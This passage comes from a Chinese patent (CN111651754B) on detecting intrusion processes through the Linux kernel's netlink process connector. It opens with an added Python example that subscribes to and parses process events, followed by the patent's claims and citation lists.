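The connection setup described above, read here as the Linux netlink connector (cn_proc) handshake: the connector instance identifier corresponds to the cb_id (CN_IDX_PROC, CN_VAL_PROC), joining the target identifier set corresponds to binding to that multicast group and sending PROC_CN_MCAST_LISTEN, and the success response is the PROC_EVENT_NONE acknowledgement. That mapping is our reading of the patent's terms, and the Python below is an added example, not the patent's code: it builds the listen/ignore request, parses the event messages the kernel returns (exercised with a constructed message), and only listen() needs a Linux host with CAP_NET_ADMIN.

```python
import os
import socket
import struct
from typing import Dict, Optional

# Constants from the Linux headers <linux/connector.h> and <linux/cn_proc.h>.
NETLINK_CONNECTOR = 11
NLMSG_DONE = 3
CN_IDX_PROC, CN_VAL_PROC = 1, 1       # cb_id of the kernel's cn_proc connector instance
PROC_CN_MCAST_LISTEN, PROC_CN_MCAST_IGNORE = 1, 2
PROC_EVENT_NONE, PROC_EVENT_FORK, PROC_EVENT_EXEC, PROC_EVENT_EXIT = 0, 1, 2, 0x80000000

# Wire layout, host byte order ("=" is native order, standard sizes, no padding).
NLMSGHDR = struct.Struct("=IHHII")     # nlmsg_len, nlmsg_type, nlmsg_flags, nlmsg_seq, nlmsg_pid
CN_MSG = struct.Struct("=IIIIHH")      # cb_id.idx, cb_id.val, seq, ack, len, flags
MCAST_OP = struct.Struct("=I")         # enum proc_cn_mcast_op
PROC_EVENT_HDR = struct.Struct("=IIQ") # what, cpu, timestamp_ns; event_data follows


def build_mcast_msg(op: int, seq: int = 0, pid: int = 0) -> bytes:
    """Request the monitor sends to the kernel: nlmsghdr + cn_msg + proc_cn_mcast_op.
    LISTEN subscribes to process events, IGNORE unsubscribes."""
    payload = CN_MSG.pack(CN_IDX_PROC, CN_VAL_PROC, seq, 0, MCAST_OP.size, 0) + MCAST_OP.pack(op)
    return NLMSGHDR.pack(NLMSGHDR.size + len(payload), NLMSG_DONE, 0, seq, pid) + payload


def build_proc_event(what: int, *fields: int, cpu: int = 0, ts: int = 0) -> bytes:
    """Construct a message in the kernel's event layout (used here to exercise the parser)."""
    data = PROC_EVENT_HDR.pack(what, cpu, ts) + struct.pack("=%di" % len(fields), *fields)
    cn = CN_MSG.pack(CN_IDX_PROC, CN_VAL_PROC, 0, 0, len(data), 0) + data
    return NLMSGHDR.pack(NLMSGHDR.size + len(cn), NLMSG_DONE, 0, 0, 0) + cn


def parse_proc_event(buf: bytes) -> Optional[Dict[str, int]]:
    """Parse one message from the connector socket; None if it is not a cn_proc event."""
    try:
        nl_len, nl_type, _flags, _seq, _pid = NLMSGHDR.unpack_from(buf, 0)
        if nl_type != NLMSG_DONE or nl_len > len(buf):
            return None
        idx, val, _cseq, _ack, _len, _cflags = CN_MSG.unpack_from(buf, NLMSGHDR.size)
        if (idx, val) != (CN_IDX_PROC, CN_VAL_PROC):   # message from another connector instance
            return None
        off = NLMSGHDR.size + CN_MSG.size
        what, cpu, ts = PROC_EVENT_HDR.unpack_from(buf, off)
        off += PROC_EVENT_HDR.size
        ev = {"what": what, "cpu": cpu, "timestamp_ns": ts}
        if what == PROC_EVENT_NONE:          # acknowledgement of our LISTEN/IGNORE request
            ev["err"] = struct.unpack_from("=I", buf, off)[0]
        elif what == PROC_EVENT_FORK:
            keys = ("parent_pid", "parent_tgid", "child_pid", "child_tgid")
            ev.update(zip(keys, struct.unpack_from("=4i", buf, off)))
        elif what == PROC_EVENT_EXEC:
            ev.update(zip(("process_pid", "process_tgid"), struct.unpack_from("=2i", buf, off)))
        elif what == PROC_EVENT_EXIT:
            keys = ("process_pid", "process_tgid", "exit_code", "exit_signal")
            ev.update(zip(keys, struct.unpack_from("=2i2I", buf, off)))
        return ev
    except struct.error:                     # truncated message
        return None


def listen(max_events: int = 5) -> None:
    """Live use on Linux (needs CAP_NET_ADMIN): open the connector, subscribe, print events."""
    sock = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM, NETLINK_CONNECTOR)
    sock.bind((os.getpid(), CN_IDX_PROC))    # join the cn_proc multicast group
    sock.send(build_mcast_msg(PROC_CN_MCAST_LISTEN, pid=os.getpid()))
    try:
        for _ in range(max_events):
            ev = parse_proc_event(sock.recv(4096))
            if ev is not None:
                print(ev)
    finally:
        sock.send(build_mcast_msg(PROC_CN_MCAST_IGNORE, pid=os.getpid()))
        sock.close()


if __name__ == "__main__":
    listen()
```

The first message the kernel returns after LISTEN is the PROC_EVENT_NONE acknowledgement; its err field is 0 when the subscription succeeded, which is the "second response message" of the patent's procedure.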
Optionally, the apparatus of the present application may further comprise: and the prompt unit is used for displaying prompt information of whether the target process is an abnormal process in the monitoring application after determining whether the target process is the abnormal process according to the data characteristics of the event data.
Optionally, the above determining unit may further be configured to: receiving a process creation message monitored by a connector instance in a system kernel, wherein the process creation message carries a process identifier of a process created in the system kernel; and taking the process represented by the process identifier as a target process.
Optionally, the above detection unit may further be configured to: under the condition that event data are detected to carry first type commands, determining that a target process belongs to a first type abnormal process, wherein the first type commands are carried in data sent to a first terminal by a second terminal, the first terminal is a terminal where a system kernel is located, and the first type abnormal process is created for executing the first type commands; and/or under the condition that the event data carries a second type of command, determining that the target process belongs to a second type of abnormal process, wherein the second type of command is a command input in a target window of a second terminal, the target window is a control window of the first terminal, and the second type of abnormal process is created for executing the second type of command.
Optionally, the above detection unit may further be configured to: before determining whether the target process is an abnormal process according to the data characteristics of the event data, comparing a process identifier carried in a process creation message monitored by a system kernel with identifiers in a target identifier set, wherein the identifiers in the target identifier set are process identifiers created by an application in the system kernel; and under the condition that the target identifier set does not have identifiers matched with the process identifiers carried in the process creation message, determining whether the target process is an abnormal process according to the data characteristics of the event data.
It should be noted that the above modules correspond to the examples and application scenarios implemented by the corresponding steps, but are not limited to what is disclosed in the above embodiments. It should be noted that the above modules may be implemented in a corresponding hardware environment as part of the apparatus, in software or in hardware, where the hardware environment includes a network environment.
According to another aspect of the embodiment of the present application, there is also provided a server or a terminal for implementing the intrusion detection method.
Fig. 5 is a block diagram of a terminal according to an embodiment of the present application. As shown in fig. 5, the terminal may include one or more processors 501 (only one is shown in fig. 5), memory 503, and transmission means 505; as shown in fig. 5, the terminal may further comprise input/output devices 507.
The memory 503 may be used to store software programs and modules, such as program instructions/modules corresponding to the intrusion detection method and apparatus in the embodiment of the present application, and the processor 501 executes the software programs and modules stored in the memory 503, thereby performing various functional applications and data processing, that is, implementing the intrusion detection method described above. Memory 503 may include high speed random access memory, and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid state memory. In some examples, the memory 503 may further include memory located remotely from the processor 501, which may be connected to the terminal via a network. Examples of such networks include, but are not limited to, the internet, intranets, local area networks, mobile communication networks, and combinations thereof.
The transmission device 505 is used for receiving or transmitting data via a network, and may also be used for data transmission between the processor and the memory. Specific examples of the network described above may include wired networks and wireless networks. In one example, the transmission device 505 includes a network adapter (Network Interface Controller, NIC) that may be connected to other network devices and routers via a network cable to communicate with the internet or a local area network. In one example, the transmission device 505 is a Radio Frequency (RF) module, which is used to communicate with the internet wirelessly.
Wherein in particular the memory 503 is used for storing application programs.
The processor 501 may call an application stored in the memory 503 via the transmission means 505 to perform the following steps:
Determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed;
acquiring event data of a target process through communication connection, wherein the communication connection is the connection for communication with a system kernel, and the event data is data generated by an associated event of the target process;
and determining whether the target process is an abnormal process according to the data characteristics of the event data.
The processor 501 is further configured to perform the steps of:
the method comprises the steps of sending first indication information to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing communication connection between a monitoring application and the system kernel, and the connector instance is an application instance in a kernel state;
Under the condition that a first response message of the system kernel representing that the establishment is successful is received, second indication information is sent to the system kernel, wherein the second indication information is used for indicating the system kernel to add an instance identifier into a target identifier set, and the identifier in the target identifier set is used for representing an application in a kernel mode which allows communication with the application in a user mode;
In the event that a second response message is received by the system kernel indicating that the joining was successful, a communication connection between the monitoring application and the system kernel is established using the connector instance.
By adopting the embodiment of the application, a scheme is provided in which a target process is determined in the system kernel, the target process being a process yet to be confirmed as an abnormal process generated by intrusion into the system kernel; event data of the target process is acquired through a communication connection, the communication connection being a connection for communication with the system kernel and the event data being data generated by an associated event of the target process; and whether the target process is an abnormal process is determined according to the data characteristics of the event data. With this scheme, whether an abnormal process exists can be monitored directly through the communication connection between user state and kernel state, without customized development of an open source project, so the time and resource consumption of such development are avoided, the technical problem of low intrusion detection efficiency in the related art can be solved, and the technical effect of improving detection efficiency is achieved.
Alternatively, specific examples in this embodiment may refer to examples described in the foregoing embodiments, and this embodiment is not described herein.
It will be appreciated by those skilled in the art that the structure shown in fig. 5 is only illustrative, and the terminal may be a smart phone (such as an Android phone, an iOS phone, etc.), a tablet computer, a palm computer, a Mobile Internet Device (MID), a PAD, etc. Fig. 5 does not limit the structure of the electronic device. For example, the terminal may also include more or fewer components (e.g., network interfaces, display devices, etc.) than shown in fig. 5, or have a different configuration than shown in fig. 5.
Those of ordinary skill in the art will appreciate that all or part of the steps in the various methods of the above embodiments may be implemented by a program instructing a terminal device to execute them in association with hardware; the program may be stored in a computer-readable storage medium, and the storage medium may include a flash disk, a Read-Only Memory (ROM), a Random Access Memory (RAM), a magnetic disk or an optical disk, etc.
The embodiment of the application also provides a storage medium. Alternatively, in the present embodiment, the storage medium described above may be used for executing the program code of the intrusion detection method.
Alternatively, in this embodiment, the storage medium may be located on at least one network device of the plurality of network devices in the network shown in the above embodiment.
Alternatively, in the present embodiment, the storage medium is configured to store program code for performing the steps of:
Determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed;
acquiring event data of a target process through communication connection, wherein the communication connection is the connection for communication with a system kernel, and the event data is data generated by an associated event of the target process;
and determining whether the target process is an abnormal process according to the data characteristics of the event data.
Optionally, the storage medium is further arranged to store program code for performing the steps of:
the method comprises the steps of sending first indication information to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing communication connection between a monitoring application and the system kernel, and the connector instance is an application instance in a kernel state;
Under the condition that a first response message of the system kernel representing that the establishment is successful is received, second indication information is sent to the system kernel, wherein the second indication information is used for indicating the system kernel to add an instance identifier into a target identifier set, and the identifier in the target identifier set is used for representing an application in a kernel mode which allows communication with the application in a user mode;
In the event that a second response message is received by the system kernel indicating that the joining was successful, a communication connection between the monitoring application and the system kernel is established using the connector instance.
Alternatively, specific examples in this embodiment may refer to examples described in the foregoing embodiments, and this embodiment is not described herein.
Alternatively, in the present embodiment, the storage medium may include, but is not limited to: a USB disk, a Read-Only Memory (ROM), a Random Access Memory (RAM), a removable hard disk, a magnetic disk, an optical disk, or other media capable of storing program code.
The foregoing embodiment numbers of the present application are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.
The integrated units in the above embodiments may be stored in the above-described computer-readable storage medium if implemented in the form of software functional units and sold or used as separate products. Based on such understanding, the technical solution of the present application may be embodied in essence or a part contributing to the prior art or all or part of the technical solution in the form of a software product stored in a storage medium, comprising several instructions for causing one or more computer devices (which may be personal computers, servers or network devices, etc.) to perform all or part of the steps of the method described in the embodiments of the present application.
In the foregoing embodiments of the present application, the descriptions of the embodiments are emphasized, and for a portion of this disclosure that is not described in detail in this embodiment, reference is made to the related descriptions of other embodiments.
In the several embodiments provided by the present application, it should be understood that the disclosed client may be implemented in other manners. The above-described embodiments of the apparatus are merely exemplary; the division of the units is merely a logical function division and may be implemented in another manner, for example, multiple units or components may be combined or integrated into another system, or some features may be omitted or not performed. Alternatively, the coupling, direct coupling or communication connection shown or discussed between components may be through some interfaces, units or modules, or may be in electrical or other forms.
The units described as separate units may or may not be physically separate, and units shown as units may or may not be physical units, may be located in one place, or may be distributed on a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, each functional unit in the embodiments of the present application may be integrated in one processing unit, or each unit may exist alone physically, or two or more units may be integrated in one unit. The integrated units may be implemented in hardware or in software functional units.
The foregoing is merely a preferred embodiment of the present application and it should be noted that modifications and adaptations to those skilled in the art may be made without departing from the principles of the present application, which are intended to be comprehended within the scope of the present application.

Claims (8)

1. A method of intrusion detection comprising:
determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed;
Acquiring event data of the target process through communication connection, wherein the communication connection is a connection for communication with the system kernel, and the event data is data generated by an associated event of the target process;
Determining whether the target process is an abnormal process according to the data characteristics of the event data;
before acquiring event data of the target process through the communication connection, the method further comprises: establishing the communication connection between a monitoring application and the system kernel, wherein the monitoring application is a user-state application; the obtaining the event data of the target process through the communication connection comprises the following steps: in the monitoring application, acquiring event data of the target process by calling the communication connection;
The establishing the communication connection between the monitoring application and the system kernel includes: the method comprises the steps that first indication information is sent to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing the communication connection between the monitoring application and the system kernel, and the connector instance is an application instance in a kernel state; sending second indication information to the system kernel under the condition that a first response message of the system kernel representing that the establishment is successful is received, wherein the second indication information is used for indicating the system kernel to add the instance identifier into a target identifier set, and identifiers in the target identifier set are used for representing applications allowed to communicate with applications in the user state in the kernel state; the communication connection between the monitoring application and the system kernel is established using the connector instance upon receiving a second response message of the system kernel indicating that the joining was successful.
2. The method of claim 1, wherein after determining whether the target process is an abnormal process based on the data characteristics of the event data, the method further comprises:
and displaying prompt information of whether the target process is an abnormal process or not in the monitoring application.
3. The method of claim 1, wherein determining a target process in a system kernel comprises:
Receiving a process creation message monitored by a connector instance in the system kernel, wherein the process creation message carries a process identifier of a process created in the system kernel;
And taking the process represented by the process identifier as the target process.
4. A method according to any one of claims 1 to 3, wherein determining whether the target process is an abnormal process based on the data characteristics of the event data comprises:
Under the condition that the event data carries a first type of command, determining that the target process belongs to a first type of abnormal process, wherein the first type of command is carried in data sent by a second terminal to a first terminal, the first terminal is a terminal where a system kernel is located, and the first type of abnormal process is created for executing the first type of command; and/or,
And under the condition that the event data carries a second type of command, determining that the target process belongs to a second type of abnormal process, wherein the second type of command is a command input in a target window of the second terminal, the target window is a control window of the first terminal, and the second type of abnormal process is created for executing the second type of command.
5. The method of claim 4, wherein prior to determining whether the target process is an abnormal process based on the data characteristics of the event data, the method further comprises:
Comparing a process identifier carried in a process creation message monitored by the system kernel with identifiers in a target identifier set, wherein the identifiers in the target identifier set are process identifiers created by applications in the system kernel;
and under the condition that the target identifier set does not have an identifier matched with the process identifier carried in the process creation message, executing the step of determining whether the target process is an abnormal process according to the data characteristics of the event data.
6. An intrusion detection device, comprising:
A determining unit, configured to determine a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed;
the acquisition unit is used for acquiring event data of the target process through communication connection, wherein the communication connection is a connection for communication with the system kernel, and the event data is data generated by an associated event of the target process;
The detection unit is used for determining whether the target process is an abnormal process according to the data characteristics of the event data;
A communication establishing unit configured to: before event data of the target process is acquired through communication connection, establishing communication connection between a monitoring application and the system kernel, wherein the monitoring application is a user-state application; the obtaining the event data of the target process through the communication connection comprises the following steps: in the monitoring application, acquiring event data of the target process by calling the communication connection;
The communication establishing unit is specifically configured to: the method comprises the steps that first indication information is sent to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing the communication connection between the monitoring application and the system kernel, and the connector instance is an application instance in a kernel state; sending second indication information to the system kernel under the condition that a first response message of the system kernel representing that the establishment is successful is received, wherein the second indication information is used for indicating the system kernel to add the instance identifier into a target identifier set, and identifiers in the target identifier set are used for representing applications allowed to communicate with applications in the user state in the kernel state; the communication connection between the monitoring application and the system kernel is established using the connector instance upon receiving a second response message of the system kernel indicating that the joining was successful.
7. A storage medium comprising a stored program, wherein the program when run performs the method of any one of the preceding claims 1 to 5.
8. An electronic device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, characterized in that the processor performs the method according to any of the preceding claims 1 to 5 by means of the computer program.
CN202010287480.XA 2020-04-13 2020-04-13 Intrusion detection method and device, storage medium and electronic device Active CN111651754B (en)
Publications (2)

Publication Number Publication Date
CN111651754A CN111651754A (en) 2020-09-11
CN111651754B true CN111651754B (en) 2024-06-14

Family

ID=72352110

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202010287480.XA Active CN111651754B (en) 2020-04-13 2020-04-13 Intrusion detection method and device, storage medium and electronic device

Country Status (1)

Country Link
CN (1) CN111651754B (en)

Families Citing this family (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN112185175B (en) * 2020-09-17 2022-02-18 北京中兵智航软件技术有限公司 Method and device for processing electronic progress list
CN112351017B (en) * 2020-10-28 2022-08-26 北京奇虎科技有限公司 Transverse penetration protection method, device, equipment and storage medium
CN113139193A (en) * 2021-04-23 2021-07-20 杭州安恒信息技术股份有限公司 Rebound shell risk judgment method, device and system
CN113395287B (en) * 2021-06-22 2022-06-28 杭州默安科技有限公司 Method and system for recording network attack IP and command execution echo
CN114205150B (en) * 2021-12-07 2024-01-23 北京天融信网络安全技术有限公司 Intrusion prevention method and device for container environment, electronic equipment and storage medium
CN116820871A (en) * 2022-03-22 2023-09-29 三六零数字安全科技集团有限公司 Method, system, storage medium and computer equipment for auditing process behavior

Citations (2)

Publication number Priority date Publication date Assignee Title
CN102663274A (en) * 2012-02-07 2012-09-12 奇智软件(北京)有限公司 Method and system for detecting remote computer-invading behavior
CN104008332A (en) * 2014-04-30 2014-08-27 浪潮电子信息产业股份有限公司 Intrusion detection system based on Android platform

Family Cites Families (2)

Publication number Priority date Publication date Assignee Title
US20040024864A1 (en) * 2002-07-31 2004-02-05 Porras Phillip Andrew User, process, and application tracking in an intrusion detection system
CN102222194A (en) * 2011-07-14 2011-10-19 哈尔滨工业大学 Module and method for LINUX host computing environment safety protection

Also Published As

Publication number Publication date
CN111651754A (en) 2020-09-11

Similar Documents

Publication Publication Date Title
CN111651754B (en) Intrusion detection method and device, storage medium and electronic device
CA2968201C (en) Systems and methods for malicious code detection
EP2106085B1 (en) System and method for securing a network from zero-day vulnerability exploits
CN104239786B (en) Exempt from ROOT Initiative Defenses collocation method and device
CN108664793B (en) Method and device for detecting vulnerability
CN112738071B (en) Method and device for constructing attack chain topology
CN111651757A (en) Attack behavior monitoring method, device, equipment and storage medium
CN109167781B (en) Network attack chain identification method and device based on dynamic correlation analysis
WO2014113501A1 (en) Systems and methods for identifying and reporting application and file vulnerabilities
CN105631312B (en) The processing method and system of rogue program
CN104239797B (en) Active defense method and device
CN107566401B (en) Protection method and device for virtualized environment
CN112395597A (en) Method and device for detecting website application vulnerability attack and storage medium
CN112615863A (en) Method, device, server and storage medium for resisting attack host
CN112787985B (en) Vulnerability processing method, management equipment and gateway equipment
Yamada et al. RAT-based malicious activities detection on enterprise internal networks
CN113886814A (en) Attack detection method and related device
CN111385308A (en) Security management method, device, equipment and computer readable storage medium
CN109474567B (en) DDOS attack tracing method and device, storage medium and electronic equipment
CN107517226B (en) Alarm method and device based on wireless network intrusion
US20210058414A1 (en) Security management method and security management apparatus
CN112398784B (en) Method and device for defending vulnerability attack, storage medium and computer equipment
CN114861168A (en) Anti-escape attack behavior deception honeypot construction method
TWI711939B (en) Systems and methods for malicious code detection
CN111258712B (en) Method and system for protecting safety of virtual machine under virtual platform network isolation

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant